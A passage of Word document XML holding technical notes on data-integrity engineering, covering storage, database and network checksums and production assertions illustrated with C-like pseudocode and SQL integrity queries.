    <w:p w14:paraId="55CB6F82" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Block-level checksums (ZFS, Btrfs approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7881BDA4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Each 512B/4KB block: 64-bit checksum stored in separate metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455409B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    On every read: verify checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759C2FE1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    On every write: compute + store checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5C613" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Scrub: periodically read all blocks, verify all checksums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EC79C8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08ADF2" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Database checksums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705F0EA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    PostgreSQL: page-level checksums (enable with --data-checksums at initdb)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F7E5E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Each 8KB page: 16-bit checksum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A83F1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Every page read: verify checksum → I/O error if mismatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4658F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Trade-off: ~1-5% write overhead (checksum computation + storage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E18CA7C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681CBEFA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    MySQL InnoDB: always checksums pages (innodb_checksum_algorithm = crc32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D7650C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4C4A3D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Network message checksums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8C793" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Kafka: CRC32C over message payload (per message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D1BD5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    gRPC: relies on TLS (HMAC) for integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F419484" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Custom protocols: include CRC32C in every message header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EB7980" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A0EC8F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Detecting checksum bugs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159FE140" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    End-to-end validation: read data → verify hash matches original hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319109AD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    The "hash of the hash" trick for metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242D0462" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      File: content hash H1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0DED37" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Metadata: hash of (filename, size, H1) → H2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275255B9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Index: hash of all metadata hashes → H3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF6A4F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Corrupting any level: H3 fails to validate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108E12D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assertions and Invariant Checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3575C083" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Production assertions — beyond test-only checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0167257B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D158286" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Traditional approach: remove assertions in production (performance concern)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D3A47" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Production: no assertions → corruption goes undetected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F194E0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Discovery: weeks later when downstream system produces wrong output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE9428C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AAC149" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Modern approach: keep assertions in production, but make them cheap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C5F1D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="3EDBF3FD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Types of assertions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C08CE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="0F5A7CCA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>1. Pre-conditions (validate inputs at function entry):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D71FC78" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  void transfer_funds(account_id src, account_id dst, int64_t amount) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF4C14" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ASSERT(amount &gt; 0, "transfer amount must be positive");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4675DA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ASSERT(src != dst, "cannot transfer to same account");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D241D30" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ASSERT(account_exists(src), "source account must exist");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8090FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5846BF27" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D20306F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EED011" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Violation: indicates caller bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B0E96D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Action: return error to caller, log, alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F7DED9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="2B2D2C62" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>2. Post-conditions (validate outputs at function exit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0C879C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  void transfer_funds(...) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB6DF9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    int64_t initial_total = balance(src) + balance(dst);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1776BE81" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    // ... perform transfer ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4177148F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    int64_t final_total = balance(src) + balance(dst);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C868C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ASSERT(initial_total == final_total,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A25F1B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">           "transfer must conserve total balance: was %d, now %d",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18277C22" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">           initial_total, final_total);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD1D85A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665D0C8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B076B8F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Violation: indicates implementation bug in this function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B64428" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Action: panic/crash (data is now corrupt, better to stop than continue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961B26E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="3407287D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>3. Invariants (system-wide properties that must always hold):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A90713" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  void periodic_integrity_check() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C811834" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    // Check balance invariant across entire accounts table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A547D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    SELECT SUM(balance) FROM accounts WHERE currency = 'USD';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D811D6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ASSERT(total == KNOWN_TOTAL_USD, "total USD balance changed unexpectedly");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3430EABA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A9ACF3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    // Check referential integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5CB5C7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    SELECT COUNT(*) FROM orders o WHERE NOT EXISTS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B6626C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      SELECT 1 FROM users u WHERE u.id = o.user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA7584" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AB3035" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ASSERT(orphan_count == 0, "found orphaned orders");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C65206B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99876D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ED69CA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Run: continuously in background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49005AB3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Frequency: every N seconds or every N transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA46995" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177349D4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>4. Statistical assertions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE4158B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  void check_distribution_invariant() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B52EF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    // Success rate should be between 99.5% and 100%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544961B5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    double success_rate = compute_success_rate_last_hour();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E363027" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ASSERT(success_rate &gt;= 0.995,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE20204" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">           "success rate %.3f below minimum", success_rate);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C740F9F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B881B21" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    // Latency p99 should be &lt; 500ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F85AF0F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    double p99_latency_ms = compute_p99_latency_last_5min();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699A5C6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ASSERT(p99_latency_ms &lt; 500,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F794FCE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">           "p99 latency %.0fms exceeds limit", p99_latency_ms);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF7787C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD62767" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B28C16" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  These are essentially SLO violations implemented as assertions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB4F086" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C17ED" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Assertion performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEB15E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Hot-path assertions (called per request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D74DEC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Fast check (~10ns) → keep in production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D52A5A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Expensive check (~1ms) → sample 1% of requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC6B3CF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Very expensive (full DB scan) → run periodically, not per-request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ECE25E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B505A4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Assert macro with sampling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A64815" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    ASSERT_SAMPLED(condition, 0.01, "message")  // checks 1% of invocations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E282FDC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → In high-throughput paths: negligible overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C0E9C8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    → Still catches bugs (just more slowly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D575D9" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
